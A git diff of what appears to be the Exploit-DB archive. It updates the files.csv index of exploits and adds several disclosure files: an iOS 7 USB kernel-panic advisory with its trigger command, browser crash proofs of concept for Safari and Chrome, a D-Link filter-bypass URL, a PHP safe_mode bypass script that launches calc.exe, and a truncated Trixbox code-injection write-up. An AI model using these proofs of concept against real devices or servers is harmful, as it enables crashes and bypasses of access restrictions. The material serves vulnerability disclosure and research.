@ -11380,8 +11380,8 @@ id,file,description,date,author,platform,type,port
12480,platforms/windows/remote/12480.txt,"Acritum Femitter Server 1.03 - Multiple Vulnerabilities",2010-05-02,"Zer0 Thunder",windows,remote,0
12481,platforms/php/webapps/12481.txt,"WHMCS Control 2 (announcements.php) SQL Injection",2010-05-02,"Islam DefenDers",php,webapps,0
12482,platforms/windows/dos/12482.py,"TFTPGUI Long Transport Mode Overflow",2010-05-02,"Jeremiah Talamantes",windows,dos,0
12484,platforms/php/webapps/12484.txt,"GuppY 4.5.18 - Blind SQL/XPath Injection Vulnerability",2010-05-02,"indoushka salah el ddine",php,webapps,0
12485,platforms/php/webapps/12485.txt,"Burning Board Lite 1.0.2 Shell Upload Vulnerability",2010-05-02,"indoushka salah el ddine",php,webapps,0
12484,platforms/php/webapps/12484.txt,"GuppY 4.5.18 - Blind SQL/XPath Injection Vulnerability",2010-05-02,indoushka,php,webapps,0
12485,platforms/php/webapps/12485.txt,"Burning Board Lite 1.0.2 Shell Upload Vulnerability",2010-05-02,indoushka,php,webapps,0
12486,platforms/php/webapps/12486.txt,"Openannuaire Openmairie Annuaire 2.00 (RFI/LFI) Multiple File Include Vulnerability",2010-05-02,"cr4wl3r ",php,webapps,0
12487,platforms/windows/dos/12487.html,"JavaScriptCore.dll Stack Exhaustion",2010-05-03,"Mathias Karlsson",windows,dos,0
12488,platforms/php/webapps/12488.txt,"Gallo 0.1.0 - Remote File Include Vulnerability",2010-05-03,"cr4wl3r ",php,webapps,0
@ -11452,10 +11452,10 @@ id,file,description,date,author,platform,type,port
12564,platforms/windows/dos/12564.txt,"Microsoft Windows Outlook Express and Windows Mail Integer Overflow",2010-05-11,"Francis Provencher",windows,dos,0
12565,platforms/php/webapps/12565.txt,"724CMS Enterprise 4.59 - (section.php) LFI Vulnerability",2010-05-11,CoBRa_21,php,webapps,0
12566,platforms/php/webapps/12566.txt,"724CMS Enterprise 4.59 - (section.php) SQL Injection Vulnerability",2010-05-11,CoBRa_21,php,webapps,0
12567,platforms/php/webapps/12567.html,"Aqar Script 1.0 - Remote Bypass Exploit",2010-05-11,"indoushka salah el ddine",php,webapps,0
12568,platforms/php/webapps/12568.txt,"Digital College 1.0 Upload Vulnerability",2010-05-11,"indoushka salah el ddine",php,webapps,0
12569,platforms/php/webapps/12569.html,"Fast Free Media 1.3 - Adult Site Upload Shell Exploit",2010-05-11,"indoushka salah el ddine",php,webapps,0
12570,platforms/php/webapps/12570.txt,"Uploader 0.1.5 - Multiple Vulnerabilities",2010-05-11,"indoushka salah el ddine",php,webapps,0
12567,platforms/php/webapps/12567.html,"Aqar Script 1.0 - Remote Bypass Exploit",2010-05-11,indoushka,php,webapps,0
12568,platforms/php/webapps/12568.txt,"Digital College 1.0 Upload Vulnerability",2010-05-11,indoushka,php,webapps,0
12569,platforms/php/webapps/12569.html,"Fast Free Media 1.3 - Adult Site Upload Shell Exploit",2010-05-11,indoushka,php,webapps,0
12570,platforms/php/webapps/12570.txt,"Uploader 0.1.5 - Multiple Vulnerabilities",2010-05-11,indoushka,php,webapps,0
12571,platforms/asp/webapps/12571.txt,"e-webtech (page.asp) SQL Injection Vulnerability",2010-05-11,CoBRa_21,asp,webapps,0
12572,platforms/php/webapps/12572.txt,"Free Advertisment cms (user_info.php) SQL Injection Vulnerability",2010-05-11,XroGuE,php,webapps,0
12573,platforms/windows/remote/12573.html,"Apple Safari 4.0.5 parent.close() (memory corruption) 0day Code Execution Exploit",2010-05-11,"Krystian Kloskowski",windows,remote,0
@ -11662,9 +11662,9 @@ id,file,description,date,author,platform,type,port
12814,platforms/php/webapps/12814.txt,"Joomla Component com_g2bridge LFI vulnerability",2010-05-31,akatsuchi,php,webapps,0
12815,platforms/windows/remote/12815.txt,"GoAheaad Webserver Source Code Disclosure Vulnerability",2010-05-30,Sil3nt_Dre4m,windows,remote,0
12816,platforms/windows/dos/12816.py,"ZipExplorer 7.0 (.zar) DoS",2010-05-31,TecR0c,windows,dos,0
12817,platforms/php/webapps/12817.txt,"QuickTalk 1.2 - Multiple Vulnerabilities (Source Code Disclosure)",2010-05-31,"indoushka salah el ddine",php,webapps,0
12818,platforms/php/webapps/12818.txt,"e107 0.7.21 full Mullti (RFI/XSS) Vulnerabilities",2010-05-31,"indoushka salah el ddine",php,webapps,0
12819,platforms/php/webapps/12819.txt,"Persian E107 XSS Vulnerability",2010-05-31,"indoushka salah el ddine",php,webapps,0
12817,platforms/php/webapps/12817.txt,"QuickTalk 1.2 - Multiple Vulnerabilities (Source Code Disclosure)",2010-05-31,indoushka,php,webapps,0
12818,platforms/php/webapps/12818.txt,"e107 0.7.21 full Mullti (RFI/XSS) Vulnerabilities",2010-05-31,indoushka,php,webapps,0
12819,platforms/php/webapps/12819.txt,"Persian E107 XSS Vulnerability",2010-05-31,indoushka,php,webapps,0
12820,platforms/php/webapps/12820.txt,"Visitor Logger (banned.php) Remote File Include Vulnerability",2010-05-31,bd0rk,php,webapps,0
12821,platforms/windows/local/12821.py,"Mediacoder 0.7.3.4672 - SEH Exploit",2010-05-31,Stoke,windows,local,0
12822,platforms/php/webapps/12822.txt,"Joomla Component com_jsjobs SQL Injection Vulnerability",2010-05-31,d0lc3,php,webapps,0
@ -11683,10 +11683,10 @@ id,file,description,date,author,platform,type,port
12852,platforms/windows/webapps/12852.txt,"QtWeb 3.3 - Remote DoS/Crash Exploit",2010-06-03,PoisonCode,windows,webapps,0
12853,platforms/windows/dos/12853.py,"Quick 'n Easy FTP Server Lite 3.1",2010-06-03,b0nd,windows,dos,0
12855,platforms/php/webapps/12855.txt,"phpBazar 2.1.1 stable - rfi Vulnerability",2010-06-03,Sid3^effects,php,webapps,0
12856,platforms/php/webapps/12856.txt,"osCSS 1.2.1 (REMOTE FILE UPLOAD) Vulnerabilities",2010-06-03,"indoushka salah el ddine",php,webapps,0
12857,platforms/php/webapps/12857.txt,"E-book Store Mullti Vulnerability",2010-06-03,"indoushka salah el ddine",php,webapps,0
12858,platforms/php/webapps/12858.txt,"Article Management System 2.1.2 Reinstall Vulnerability",2010-06-03,"indoushka salah el ddine",php,webapps,0
12859,platforms/php/webapps/12859.txt,"Advneced Management For Services Sites (File Disclosure) Vulnerabilities",2010-06-03,"indoushka salah el ddine",php,webapps,0
12856,platforms/php/webapps/12856.txt,"osCSS 1.2.1 (REMOTE FILE UPLOAD) Vulnerabilities",2010-06-03,indoushka,php,webapps,0
12857,platforms/php/webapps/12857.txt,"E-book Store Mullti Vulnerability",2010-06-03,indoushka,php,webapps,0
12858,platforms/php/webapps/12858.txt,"Article Management System 2.1.2 Reinstall Vulnerability",2010-06-03,indoushka,php,webapps,0
12859,platforms/php/webapps/12859.txt,"Advneced Management For Services Sites (File Disclosure) Vulnerabilities",2010-06-03,indoushka,php,webapps,0
12861,platforms/php/webapps/12861.txt,"PHP SETI@home web monitor (phpsetimon) RFI / LFI Vulnerability",2010-06-03,eidelweiss,php,webapps,0
12865,platforms/hardware/remote/12865.txt,"Motorola SURFBoard Cable Modem Directory Traversal",2010-06-03,"S2 Crew",hardware,remote,0
12866,platforms/php/webapps/12866.txt,"K9 Kreativity Design (pages.php) SQL Injection Vulnerability",2010-06-03,Newbie_Campuz,php,webapps,0
@ -12288,8 +12288,8 @@ id,file,description,date,author,platform,type,port
13996,platforms/php/webapps/13996.txt,"Pre Multi-Vendor Shopping Malls (products.php?sid) SQL Injection Vulnerability",2010-06-23,CoBRa_21,php,webapps,0
13997,platforms/php/webapps/13997.txt,"Joomla JE Ajax Event Calendar SQL Injection Vulnerability",2010-06-23,"L0rd CrusAd3r",php,webapps,0
13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - (.plf) SEH universale Buffer Overflow",2010-06-23,Madjix,windows,local,0
13999,platforms/php/webapps/13999.html,"Software Index (Remote File Upload) Exploit",2010-06-23,"indoushka salah el ddine",php,webapps,0
14000,platforms/php/webapps/14000.txt,"PishBini Footbal XSS and SQL Injection Vulnerability",2010-06-23,"indoushka salah el ddine",php,webapps,0
13999,platforms/php/webapps/13999.html,"Software Index (Remote File Upload) Exploit",2010-06-23,indoushka,php,webapps,0
14000,platforms/php/webapps/14000.txt,"PishBini Footbal XSS and SQL Injection Vulnerability",2010-06-23,indoushka,php,webapps,0
14001,platforms/multiple/webapps/14001.txt,"InterScan Web Security Virtual Appliance 5.0 - Arbitrary File Download",2010-06-23,"Ivan Huertas",multiple,webapps,0
14002,platforms/freebsd/local/14002.c,"FreeBSD Kernel nfs_mount() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0
14003,platforms/freebsd/dos/14003.c,"FreeBSD Kernel mountnfs() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0
@ -12631,7 +12631,7 @@ id,file,description,date,author,platform,type,port
14412,platforms/windows/remote/14412.rb,"Hero DVD Buffer Overflow Exploit (meta)",2010-07-19,Madjix,windows,remote,0
14413,platforms/windows/dos/14413.txt,"IE 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control",2010-07-20,"Beenu Arora",windows,dos,0
14414,platforms/windows/dos/14414.txt,"Unreal Tournament 3 2.1 'STEAMBLOB' Command Remote Denial of Service Vulnerability",2010-07-20,"Luigi Auriemma",windows,dos,0
14415,platforms/php/webapps/14415.html,"EZ-Oscommerce 3.1 - Remote File Upload",2010-07-20,"indoushka salah el ddine",php,webapps,0
14415,platforms/php/webapps/14415.html,"EZ-Oscommerce 3.1 - Remote File Upload",2010-07-20,indoushka,php,webapps,0
14416,platforms/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption Exploit",2010-07-20,"Elazar Broad",windows,remote,0
14419,platforms/asp/webapps/14419.txt,"Caner Hikaye Script SQL Injection Vulnerability",2010-07-20,v0calist,asp,webapps,0
14420,platforms/asp/webapps/14420.txt,"Mayasan Portal 2.0 - (makaledetay.asp) SQL Injection Vulnerability",2010-07-20,v0calist,asp,webapps,0
@ -12758,7 +12758,7 @@ id,file,description,date,author,platform,type,port
14581,platforms/windows/local/14581.py,"myMP3-Player 3.0 - Buffer Overflow Exploit",2010-08-08,"Oh Yaw Theng",windows,local,0
14582,platforms/windows/dos/14582.pl,"ffdshow Video Codec Denial of Service Vulnerability",2010-08-08,"Nishant Das Patnaik",windows,dos,0
14584,platforms/windows/dos/14584.py,"QQ Computer Manager TSKsp.sys Local Denial of Service Exploit",2010-08-09,"Lufeng Li",windows,dos,0
14585,platforms/php/webapps/14585.php,"kleeja 1.0.0RC6 Database Disclosure",2010-08-09,"indoushka salah el ddine",php,webapps,0
14585,platforms/php/webapps/14585.php,"kleeja 1.0.0RC6 Database Disclosure",2010-08-09,indoushka,php,webapps,0
14586,platforms/windows/remote/14586.html,"dBpowerAMP Audio Player 2 (FileExists) ActiveX Buffer Overflow Exploit",2010-08-09,s-dz,windows,remote,0
14587,platforms/windows/dos/14587.py,"Visual MP3 Splitter & Joiner 6.1 - Denial of Service Vulnerability",2010-08-09,"Oh Yaw Theng",windows,dos,0
14589,platforms/php/webapps/14589.txt,"Php Nuke 8.x.x Blind SQL Injection Vulnerability",2010-08-09,ITSecTeam,php,webapps,0
@ -28705,7 +28705,7 @@ id,file,description,date,author,platform,type,port
31910,platforms/php/webapps/31910.txt,"vBulletin 3.6.10/3.7.1 - 'redirect' Parameter Cross-Site Scripting Vulnerability",2008-06-13,anonymous,php,webapps,0
31911,platforms/linux/local/31911.txt,"Vim 7.x - Vim Script Multiple Command Execution Vulnerabilities",2008-06-14,"Jan Minar",linux,local,0
31913,platforms/windows/dos/31913.pl,"Music AlarmClock 2.1.0 - (.m3u) Crash PoC",2014-02-26,"Gabor Seljan",windows,dos,0
31914,platforms/windows/dos/31914.pl,"GoldMP4Player 3.3 - Buffer Overflow PoC (SEH)",2014-02-26,"Gabor Seljan",windows,dos,0
31914,platforms/windows/dos/31914.pl,"Gold MP4 Player 3.3 - Buffer Overflow PoC (SEH)",2014-02-26,"Gabor Seljan",windows,dos,0
31915,platforms/linux/dos/31915.py,"GoAhead Web Server 3.1.x - Denial of Service",2014-02-26,"Alaeddine MESBAHI",linux,dos,80
31916,platforms/php/webapps/31916.txt,"Piwigo 2.6.1 - CSRF Vulnerability",2014-02-26,killall-9,php,webapps,80
31917,platforms/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution",2014-02-26,metasploit,windows,remote,9090
@ -28762,7 +28762,7 @@ id,file,description,date,author,platform,type,port
31968,platforms/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 Malformed Playlist File Denial Of Service Vulnerability",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0
31970,platforms/php/webapps/31970.txt,"PHP-CMDB 0.7.3 - Multiple Vulnerabilities",2014-02-28,HauntIT,php,webapps,80
31971,platforms/php/webapps/31971.txt,"PHP Ticket System Beta 1 (get_all_created_by_user.php, id param) - SQL Injection",2014-02-28,HauntIT,php,webapps,80
31972,platforms/windows/local/31972.py,"GoldMP4Player 3.3 - Buffer Overflow Exploit (SEH)",2014-02-28,metacom,windows,local,0
31972,platforms/windows/local/31972.py,"Gold MP4 Player 3.3 - Buffer Overflow Exploit (SEH)",2014-02-28,metacom,windows,local,0
31975,platforms/php/webapps/31975.txt,"The Rat CMS viewarticle.php Multiple Parameter XSS",2008-06-26,"CWH Underground",php,webapps,0
31976,platforms/php/webapps/31976.txt,"The Rat CMS viewarticle2.php id Parameter XSS",2008-06-26,"CWH Underground",php,webapps,0
31977,platforms/php/webapps/31977.txt,"The Rat CMS viewarticle.php id Parameter SQL Injection",2008-06-26,"CWH Underground",php,webapps,0
@ -29039,6 +29039,7 @@ id,file,description,date,author,platform,type,port
32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 english/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
32260,platforms/php/webapps/32260.txt,"Freeway 1.4.1.171 french/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
32261,platforms/windows/local/32261.rb,"MicroP 0.1.1.1600 - (.mppl) Local Stack Based Buffer Overflow",2014-03-14,"Necmettin COSKUN",windows,local,0
32263,platforms/php/webapps/32263.txt,"Trixbox (endpoint_aastra.php, mac param) - Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80
32264,platforms/php/webapps/32264.txt,"Freeway 1.4.1.171 french/account_newsletters.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
32265,platforms/php/webapps/32265.txt,"Freeway 1.4.1.171 includes/modules/faqdesk/faqdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
32266,platforms/php/webapps/32266.txt,"Freeway 1.4.1.171 includes/modules/newsdesk/newsdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
@ -29092,11 +29093,27 @@ id,file,description,date,author,platform,type,port
32317,platforms/php/webapps/32317.txt,"@Mail 5.42 and @Mail WebMail 5.0.5 Multiple Cross-Site Scripting Vulnerabilities",2008-09-03,C1c4Tr1Z,php,webapps,0
32318,platforms/php/webapps/32318.txt,"XRMS 1.99.2 login.php target Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32319,platforms/php/webapps/32319.txt,"OpenSupports 2.x - Auth Bypass/CSRF Vulnerabilities",2014-03-17,"TN CYB3R",php,webapps,0
32320,platforms/php/webapps/32320.txt,"XRMS 1.99.2 activities/some.php title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32321,platforms/php/webapps/32321.txt,"XRMS 1.99.2 companies/some.php company_name Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32320,platforms/php/webapps/32320.txt,"XRMS 1.99.2 - activities/some.php title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32321,platforms/php/webapps/32321.txt,"XRMS 1.99.2 - companies/some.php company_name Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32322,platforms/php/webapps/32322.txt,"XRMS 1.99.2 contacts/some.php last_name Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32323,platforms/php/webapps/32323.txt,"XRMS 1.99.2 campaigns/some.php campaign_title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32324,platforms/php/webapps/32324.txt,"XRMS 1.99.2 opportunities/some.php opportunity_title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32325,platforms/php/webapps/32325.txt,"XRMS 1.99.2 cases/some.php case_title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32326,platforms/php/webapps/32326.txt,"XRMS 1.99.2 files/some.php file_id Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32327,platforms/php/webapps/32327.txt,"XRMS 1.99.2 reports/custom/mileage.php starting Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
32329,platforms/windows/dos/32329.rb,"Gold MP4 Player 3.3 - Universal SEH Exploit (MSF)",2014-03-17,"Revin Hadi Saputra",windows,dos,0
32330,platforms/php/webapps/32330.txt,"OpenSupports 2.0 - Blind SQL Injection",2014-03-17,indoushka,php,webapps,0
32331,platforms/php/webapps/32331.txt,"Joomla AJAX Shoutbox <= 1.6 - Remote SQL Injection Vulnerability",2014-03-17,"Pen Ten",php,webapps,0
32332,platforms/windows/dos/32332.txt,"Free Download Manager - Stack-based Buffer Overflow",2014-03-17,"Julien Ahrens",windows,dos,80
32333,platforms/hardware/dos/32333.txt,"iOS 7 - Kernel Mode Memory Corruption",2014-03-17,"Andy Davis",hardware,dos,0
32334,platforms/php/webapps/32334.txt,"Celerondude Uploader 6.1 'account.php' Cross-Site Scripting Vulnerability",2008-09-03,Xc0re,php,webapps,0
32335,platforms/multiple/dos/32335.js,"Google Chrome 0.2.149 Malformed 'view-source' HTTP Header Remote Denial of Service Vulnerability",2008-09-05,"Juan Pablo Lopez Yacubian",multiple,dos,0
32336,platforms/hardware/remote/32336.txt,"D-Link DIR-100 1.12 Security Bypass Vulnerability",2008-09-08,"Marc Ruef",hardware,remote,0
32337,platforms/php/webapps/32337.txt,"Silentum LoginSys 1.0 Multiple Cross-Site Scripting Vulnerabilities",2008-09-06,"Maximiliano Soler",php,webapps,0
32338,platforms/php/webapps/32338.txt,"phpAdultSite CMS 'results_per_page' Parameter Cross-Site Scripting Vulnerability",2008-09-07,"David Sopas",php,webapps,0
32340,platforms/php/webapps/32340.txt,"Gallery 2.0 Multiple Cross Site Scripting Vulnerabilities",2008-09-08,sl4xUz,php,webapps,0
32341,platforms/hardware/dos/32341.html,"Apple iPhone 1.1.4/2.0 and iPod 1.1.4/2.0 touch Safari WebKit 'alert()' Function Remote Denial of Service Vulnerability",2008-09-12,"Nicolas Economou",hardware,dos,0
32342,platforms/php/webapps/32342.txt,"eXtrovert software Thyme 1.3 'pick_users.php' SQL Injection Vulnerability",2008-09-08,"Omer Singer",php,webapps,0
32343,platforms/php/local/32343.php,"PHP 5.2.5 Multiple Functions 'safe_mode_exec_dir' and 'open_basedir' Restriction Bypass Vulnerabilities",2008-09-08,Ciph3r,php,local,0
32344,platforms/windows/remote/32344.txt,"Microsoft Windows Image Acquisition Logger ActiveX Control Arbitrary File Overwrite Vulnerability (1)",2008-09-08,Ciph3r,windows,remote,0
32345,platforms/windows/remote/32345.cpp,"Microsoft Windows Image Acquisition Logger ActiveX Control Arbitrary File Overwrite Vulnerability (2)",2008-09-08,Ciph3r,windows,remote,0

Can't render this file because it is too large.

112
platforms/hardware/dos/32333.txt Executable file
View file

@ -0,0 +1,112 @@
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Vulnerability Summary
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Title iOS 7 arbitrary code execution in kernel mode
Release Date 14 March 2014
Reference NGS00596
Discoverer Andy Davis
Vendor Apple
Vendor Reference 600217059
Systems Affected iPhone 4 and later, iPod touch (5th generation) and later,
iPad 2 and later
CVE Reference CVE-2014-1287
Risk High
Status Fixed
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Resolution Timeline
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Discovered 26 September 2013
Reported 26 September 2013
Released 26 September 2013
Fixed 10 March 2014
Published 14 March 2014
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Vulnerability Description
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
When a specific value is supplied in USB Endpoint descriptor for a HID device
the Apple device kernel panics and reboots
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
The bug can be triggered using umap (https://github.com/nccgroup/umap)
as follows:
sudo python3 ./umap.py -P /dev/ttyUSB0 -s 09:00:00:E:46
bMaxPacketSize = 0xff
Incident Identifier: F0856C91-7616-4DAC-9907-C504401D9951
CrashReporter Key: 7ed804add6a0507b6a8ca9625f0bcd14abc6801b
Hardware Model: iPhone3,1
Date/Time: 2013-09-26 12:35:46.892 +0100
OS Version: iOS 7.0 (11A465)
panic(cpu 0 caller 0x882220a5): kernel abort type 4: fault_type=0x1,
fault_addr=0x28
r0: 0x00000003 r1: 0x889e70bd r2: 0x00000012 r3: 0xfffffffe
r4: 0x9ae83000 r5: 0x00000003 r6: 0x00000000 r7: 0x87ff3d78
r8: 0x00000000 r9: 0x00000000 r10: 0x00000000 r11: 0x00000001
r12: 0x87ff3d50 sp: 0x87ff3d10 lr: 0x88af52bf pc: 0x88af51f8
cpsr: 0x80000033 fsr: 0x00000005 far: 0x00000028
Debugger message: panic
OS version: 11A465
Kernel version: Darwin Kernel Version 14.0.0: Tue Aug 13 21:39:05 PDT 2013;
root:xnu-2423.1.73~3/RELEASE_ARM_S5L8930X
iBoot version: iBoot-1940.1.75
secure boot?: YES
Paniclog version: 1
Kernel slide: 0x0000000008200000
Kernel text base: 0x88201000
Epoch Time: sec usec
Boot : 0x52441b69 0x00000000
Sleep : 0x00000000 0x00000000
Wake : 0x00000000 0x00000000
Calendar: 0x52441bb5 0x00056497
Panicked task 0x896f8d48: 12856 pages, 114 threads: pid 0: kernel_task
panicked thread: 0x8023de90, backtrace: 0x87ff3a48
lr: 0x88317889 fp: 0x87ff3a7c
lr: 0x883181f7 fp: 0x87ff3ab0
lr: 0x882b783b fp: 0x87ff3ad4
lr: 0x882220a5 fp: 0x87ff3ba0
lr: 0x8821c7c4 fp: 0x87ff3d78
lr: 0x88af8687 fp: 0x87ff3da8
lr: 0x8828b5bd fp: 0x87ff3dd0
lr: 0x889d6d29 fp: 0x87ff3df0
lr: 0x889da2f3 fp: 0x87ff3e18
lr: 0x8828b5bd fp: 0x87ff3e40
lr: 0x889da14f fp: 0x87ff3e7c
lr: 0x88acb8e7 fp: 0x87ff3eb8
lr: 0x88ac9815 fp: 0x87ff3ed4
lr: 0x884b24d3 fp: 0x87ff3f60
lr: 0x882cf869 fp: 0x87ff3fa8
lr: 0x8821f05c fp: 0x00000000
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Fix Information
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
A patch can be downloaded from the following location:
http://support.apple.com/kb/HT1222
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
NCC Group
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Research https://www.nccgroup.com/research
Twitter https://www.twitter.com/NCCGroupInfoSec / @NCCGroupInfoSec
Open Source https://github.com/nccgroup
Blog https://www.nccgroup.com/en/blog/cyber-security/
SlideShare http://www.slideshare.net/NCC_Group/
For more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br>
This email message has been delivered safely and archived online by Mimecast.

12
platforms/hardware/dos/32341.html Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/31061/info
Apple iPhone and iPod touch are prone to a remote denial-of-service vulnerability that occurs in the WebKit library used by the Safari browser.
Remote attackers can exploit this issue to crash the affected browser installed on the devices, denying service to legitimate users.
The following devices and corresponding firmware are affected:
iPhone 1.1.4 and 2.0
iPod touch 1.1.4 and 2.0
<html> <body> <form> <script type="text/javascript" language="JavaScript"> var st = "A"; alert ( "Crashing Safari on iPhone..." ); for ( var d = 1 ; d <= 16 ; d ++ ) { st += st; } alert ( st ); </script> </form> </body> </html>

7
platforms/hardware/remote/32336.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31050/info
D-Link DIR-100 is affected by a vulnerability that allows attackers to bypass security restrictions and access sites that are blocked by an administrator.
D-Link DIR-100 devices with firmware 1.12 are vulnerable; other versions may be affected as well.
http://www.example.com/?foo=aaa(...)

13
platforms/multiple/dos/32335.js Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/31035/info
Google Chrome is prone to a remote denial-of-service vulnerability because the application fails to handle specially crafted HTTP 'view-source' headers.
Attackers can exploit this issue to crash the affected application, denying service to legitimate users.
Google Chrome 0.2.149.27 is vulnerable; other versions may also be affected.
<script>
a = window.open("view-source:http://123")
a.alert(1)
</script>

87
platforms/php/local/32343.php Executable file
View file

@ -0,0 +1,87 @@
source: http://www.securityfocus.com/bid/31064/info
PHP is prone to 'safe_mode_exec_dir' and 'open_basedir' restriction-bypass vulnerabilities. Successful exploits could allow an attacker to execute arbitrary code.
These vulnerabilities would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; in such cases, the 'safe_mode' and 'open_basedir' restrictions are expected to isolate users from each other.
PHP 5.2.5 is vulnerable; other versions may also be affected.
<?php
print_r('----------------------------------------------------------------------------------------
PHP 5.2.5 Multiple Function "open_basedir" and "safe_mode_exec_dir" Restriction Bypass
----------------------------------------------------------------------------------------
-------------------------------------
author: Ciph3r
mail: Ciph3r_blackhat@yahoo.com
site: www.expl0iters.ir
S4rK3VT Hacking TEAM
we are : Ciph3r & Rake
Sp Tanx2 : Iranian Hacker & kurdish Security TEAM
-------------------------------------
-------------------------------------
Remote execution: No
Local execution: Yes
-------------------------------------
---------------------------------------------
PHP.INI settings:
safe_mode = Off
disable_functions =
open_basedir = htdocs <-- bypassed
safe_mode_exec_dir = htdocs <-- bypassed
---------------------------------------------
-------------------------------------------------------------------------------------------
Description:
Functions "exec", "system", "shell_exec", "passthru", "popen", if invoked from local,
are not properly checked and bypass "open_basedir" and "safe_mode_exec_dir" restrictions:
-------------------------------------------------------------------------------------------
');
$option = $argv[1];
if ($option=="1"){
exec('c:/windows/system32/calc.exe');
echo '"exec" test completed';
elseif($option=="2"){
system('c:/windows/system32/calc.exe');
echo '"system" test completed';
}
elseif($option=="3"){
shell_exec('c:/windows/system32/calc.exe');
echo '"shell_exec test" completed';
}
elseif($option=="4"){
passthru('c:/windows/system32/calc.exe');
echo '"passthru" test completed';
}
elseif($option=="5"){
popen('c:/windows/system32/calc.exe','r');
echo '"popen" test completed';
}
elseif($option==6){
exec('c:/windows/system32/calc.exe');
echo "exec test completed\n";
system('c:/windows/system32/calc.exe');
echo "system test completed\n";
shell_exec('c:/windows/system32/calc.exe');
echo "shell_exec test completed\n";
passthru('c:/windows/system32/calc.exe');
echo "passthru test completed\n";
popen('c:/windows/system32/calc.exe','r');
echo "popen test completed\n";
}
else{
print_r('--------------------------------------
Usage:
php poc.php 1 => for "exec" test
php poc.php 2 => for "system" test
php poc.php 3 => for "shell_exec" test
php poc.php 4 => for "passthru" test
php poc.php 5 => for "popen" test
php poc.php 6 => for "all in one" test
--------------------------------------
');
}
?>

89
platforms/php/webapps/32263.txt Executable file
View file

@ -0,0 +1,89 @@
# App : Trixbox all versions
# vendor : trixbox.com
# Author : i-Hmx
# mail : n0p1337@gmail.com
# Home : security arrays inc , sec4ever.com ,exploit4arab.net
Well well well , we decided to give schmoozecom a break and have a look @
fonality products
do you think they have better product than the (Award winning) trixbox!!!
I don't think so
"Designed and marketed for Fonality's partner community, trixbox Pro is an
IP-PBX software solution purpose built to support growing SMB businesses.
A unique hybrid hosted telephony solution; trixbox Pro provides big
business features at an SMB cost . . blah blah blah"
What do we have here??
A 3 years old Sql injection flaw???
not big deal , and already been reported
not enough good exploitation , but reported
A file disclosure flaw???
save it for later
let's give Fonality little Remote root Exploit xD
and also give the "Predictors" some pain in the ass trying to exploit this
consider it as challenge ;)
Here we go
Vulnerable file :
/var/www/html/maint/modules/endpointcfg/endpoint_aastra.php
Pice of shit , sorry i mean code
switch($_action) {
case 'Edit':
if ($_REQUEST['newmac']){ // create a new phone from device map
$mac_address = $_REQUEST['newmac'];
}
if ($_REQUEST['mac']){
$phoneinfo = GetPhone($_REQUEST['mac'],$PhoneType);
$mac_address=$phoneinfo['mac_address']; } // if there is a
